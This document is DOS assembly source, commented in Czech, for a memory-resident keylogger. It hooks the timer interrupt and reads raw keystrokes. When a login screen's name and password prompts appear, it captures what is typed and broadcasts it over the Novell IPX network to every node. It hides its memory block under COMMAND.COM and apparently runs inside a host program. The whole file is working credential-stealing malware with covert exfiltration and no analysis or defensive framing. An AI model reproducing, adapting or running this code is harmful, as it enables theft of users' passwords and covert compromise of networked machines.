  RSock  = 4123h
  SSock  = 4124h
  Posun  = 12*16
  Size16 = (offset begin - offset _TEXT + 15) shr 4

ECBs    struc
      Link       dd    0
      ESR        dd    0
      InUse      db    0
      ComplCode  db    0
      socket     dw    0
      IPXwspc    db    4  dup (0)
      DRVwspc    db    12 dup (0)
      ImmdAdr    db    6  dup (0FFh)
      FragCnt    dw    1h
      FragDta    dw    0
                 dw    0
      FragSize   dw    132
ECBs    ends

IPXhead struc
      checksum   dw    0FFFFh
      h_length   dw    0
      TransPCtrl db    0
      PacketType db    0
      DestNetw   db    4 dup (0)
      DestNode   db    6 dup (0FFh)
      DestSckt   dw    0
      SrceNetw   db    4 dup (0)
      SrceNode   db    6 dup (0FFh)
      SrceSckt   dw    0
IPXhead ends

  STEJNESEG macro
    mov ax,cs
    mov ds,ax
    mov es,ax
  endm

_TEXT segment
  assume cs:_TEXT , ds:_TEXT , es:_TEXT , ss:_TEXT

  org 100h
@filename:
  jmp begin

EndStack:
  ECB         ECBs    <,,,,,,,,1h,offset head,,>
  head        IPXhead <>
  KIndex      dw 0
  Kdata       db 100 dup (0)
  Reading     db 0    ; 0 - nic
                      ; 1 - heslo
                      ; 2 - jmeno
  ofs_1C      dw ?
  seg_1C      dw ?
  busy        db 0
  SSeg        dw ?
  SPtr        dw ?
  LastPort    db 0
  LastName    db 0
  LastPass    db 0
  sendtimeout db 0

;-----------------------------------------------------------------------------
Is_name proc near
  mov ax,0B800h
  mov ds,ax
  cmp byte ptr ds:[2*(4*80+12)],'p'
  jne N_on_n
  cmp byte ptr ds:[2*(4*80+15)],'j'
  jne N_on_n
  mov bl,1
  ret
N_on_n:
  mov bl,0
  ret
Is_name endp

;-----------------------------------------------------------------------------
Zvys proc near
  assume cs:_TEXT , ds:_TEXT , es:_TEXT , ss:_TEXT

  mov si,cs:[KIndex]
  mov cs:[KData+si],al
  cmp cs:[Kindex],99                ; Pokud jsme na konci ..
  je null
  inc cs:[KIndex]
  ret
 null:
  mov cs:[KIndex],0                 ; .. skocime na zacatek
  ret
Zvys endp

;-----------------------------------------------------------------------------
Net proc near
  push es
  push si
  int 7Ah
  pop si
  pop es
  ret
Net endp
;-----------------------------------------------------------------------------
Posli proc near
  mov si ,offset ECB

  mov ECB.FragSize ,132
  mov ECB.Socket   ,SSock
  mov ECB.FragDTA+2,ds
  mov head.DestSckt,SSock
  mov ax,0FFFFh
  mov cx,6
  mov di,offset head.DestNode
  cld
  rep stosb
  mov ax,0h
  mov cx,4
  mov di,offset head.DestNetw
  rep stosb

  mov bx,3
  call Net

  ret
Posli endp
;-----------------------------------------------------------------------------
Prijem proc near
  mov si ,offset ECB
  mov ECB.FragSize ,30
  mov ECB.Socket   ,RSock
  mov ECB.FragDTA+2,ds

  mov ax,0FFFFh
  mov cx,6
  mov di,offset ECB.ImmdAdr
  cld
  rep stosb

  mov bx,4
  call Net

  ret
Prijem endp
;-----------------------------------------------------------------------------
Active proc near
  cmp cs:[sendtimeout],0            ; Posila se ?
  je npos
  cmp cs:[sendtimeout],1            ; Dosel timeout ?
  dec byte ptr cs:[sendtimeout]     ; ( Sniz ho )
  je timeout
  jmp konec                         ; Nedosel - koncim
timeout:
  mov bx,6                          ;       zrus udalost
  mov si ,offset ECB
  call Net
  call prijem                       ;       zavolej prijem

Npos:

  cmp byte ptr cs:[ECB.InUse],0     ; Prisel paket ?
  jne neprislo

  call posli                        ; Ano - poslu zpravu
  mov cs:[sendtimeout],5            ; Nastavim timeout na 5 tiku
  jmp konec

neprislo:

  call is_name                      ; Cist jmeno ?
  cmp cs:[LastName],bl
  jae n_name
  mov cs:[Reading],2                ; Ano - cti
  mov al,130
  call zvys
n_name:
  mov cs:[LastName],bl

  in al,60h                         ; Zmenil se port ?
  cmp al,cs:[LastPort]
  je konec

  mov cs:[LastPort],al              ; Je nad 128 ?
  cmp al,128
  jb konec

  cmp al,9Ch                        ; Stisknut Enter ?
  jne dal
  mov si,cs:[KIndex]                ; Co kdyz se jeste nic neprecetlo ?
  cmp cs:[KData+si-1],128
  jae konec
  cmp cs:[Reading],0
  je konec
  dec cs:[Reading]
  mov al,132
  cmp cs:[Reading],1
  jne konec_cteni
  mov al,131                        ; Ted se cte heslo
konec_cteni:

  call zvys
  jmp konec
dal:

  cmp cs:[Reading],0                ; Zapis znak do bufferu
  je konec
  and al,7Fh
  call zvys

konec:
  mov ax,0B800h
  mov ds,ax
  mov ax,0

  ret
Active endp

;-----------------------------------------------------------------------------
Int1C proc far
  assume cs:_TEXT , ds:_TEXT , es:_TEXT , ss:_TEXT
  pushf                             ; Zavolam puvodni obsluhu
  call dword ptr cs:[ofs_1C]
  cmp cs:[Busy],1                   ; Nebezim uz ?
  je nic
  push ax
  mov cs:[busy],1                   ; Prepnu zasobnik
  mov cs:[SSeg],ss
  mov cs:[SPtr],sp
  mov ax,cs
  cli
  mov ss,ax
  mov sp,offset cs:[ENDSTACK]
  sti
  push ds                           ; Uschovam do nej registry
  push es
  push si
  push di
  push dx
  push cx
  push bx
;  push bp
;  mov bp,sp
  STEJNESEG

  call active                       ; Hlavni procedura

;  pop bp
  pop bx                            ; Obnovim registry
  pop cx
  pop dx
  pop di
  pop si
  pop es
  pop ds
  cli                               ; Zasobnik zpet
  mov ss,cs:[SSeg]
  mov sp,cs:[SPtr]
  sti
  pop ax
  mov cs:[Busy],0
nic:
  iret
Int1C endp
;-----------------------------------------------------------------------------
begin proc near
  assume cs:_TEXT , ds:_TEXT , es:_TEXT , ss:_TEXT
  STEJNESEG

;  mov ah,4Ah                        ; EXEC
;  mov bx,size16
;  int 21h

;  mov cs:[EXpar+4],ds
;  mov dx,offset jmeno
;  mov bx,offset EXpar
;  mov al,0
;  mov ah,4Bh
;  int 21h

;  STEJNESEG

  mov ax,7A00h                      ; Je IPX ?
  int 2Fh
  cmp al,0FFh
  jne error

  mov al,0FFh                       ; Otevrit socket
  mov bx,0
  mov dx,Rsock
  call Net
  cmp al,0
  jne error

;  mov ax,word ptr cs:[2Ch]          ; Uvolni prostredi
;  mov es,ax
;  mov ah,49h
;  int 21h

  mov ax,351Ch                      ; Zjistit INT 1Ch
  int 21h
  mov word ptr cs:[ofs_1C],bx
  mov word ptr cs:[seg_1C],es

  mov word ptr [offset ECB+4],0     ; Priprava ECB
  mov word ptr [offset ECB+6],0
  mov ECB.FragDTA  ,offset head
  mov ECB.FragCnt  ,1

  call vyhrad                       ; Priprav pametovy blok
  jb error

  push es
  pop ds

  call prijem

  lea dx,Int1C                      ; Nastavit INT 08h
  mov ax,251Ch
  int 21h

;  mov ax,3100h                     ; Keep
;  mov dx,size16
;  int 21h

error:                              ; Konec
   mov ax,cs
   mov bx,word ptr cs:[Entry+2]
   sub ax,bx
   mov word ptr cs:[Entry+2],ax
   jmp dword ptr cs:[Entry]
;  mov ax,4C01h
;  int 21h

begin endp

entry  db '$$$!'
string db 'COMMAND'
;jmeno  db 'login.exe',0
;EXpar  dw 0,offset Param,0,0,0,0,0
;Param  db 00h,0Dh

vyhrad proc near                    ; Vyhrazeni bloku na konci pameti

  STEJNESEG
  mov ah,52h                        ; Najdeme 1.blok
  int 21h
  mov ds,word ptr es:[bx-2]
  mov dx,0

dalsi:                              ; Dalsi blok ...

  mov ax,cs
  mov es,ax

  mov si,8                          ; Je to blok COMMAND.COM ?
  mov di,offset string
  mov cx,7
  cld
  repe cmpsb
  cmp cx,0
  jne dalM                          ; neni - dal

  mov dx,ds                         ; je - ulozim a koncim
  inc dx
  jmp nalezeno

dalM:

  mov ax,ds                         ; Posunu se na dalsi blok
  add ax,word ptr ds:[3]
  inc ax
  mov ds,ax

  cmp byte ptr ds:[0],'M'           ; Je to uz posledni ?

  je dalsi
                                    ; Dosli jsme az na konec
                                    ; a COMMAND jsme nenasli
Chyba:
  stc
  ret                               ; Konec s chybou

Nalezeno:                           ; COMMAND nalezen na DX

  mov ah,48h                        ; Kolik je volne pameti ?
  mov bx,0FFFFh
  int 21h                           ; Ulozi se do BX

  mov ah,48h                        ; Vyhradime blok velikosti (BX-nase delka)
  sub bx,size16 + 1 - (posun/16)
  int 21h
  jb chyba                          ; Nedostatek pameti

  mov ah,48h                        ; Vyhradime si nas blok
  mov bx,size16 - (posun/16)
  int 21h                           ; V AX je jeho segment
  jb chyba                          ; Nedostatek pameti

  dec ax                            ; Priradime ho COMMAND.COMu
  mov es,ax
  inc ax
  mov word ptr es:[1],dx

  mov es,ax                         ; Zkopiruji tam sam sebe

  push cs
  pop ds

  mov ax,es
  sub ax,(posun/16)
  mov es,ax
  mov si,posun
  mov di,posun
  mov cx,offset begin - offset _TEXT - posun
  cld
  rep movsb

  clc                               ; Skoncili jsme bez chyby
  ret
vyhrad endp

program_end:
_TEXT ends
END @filename
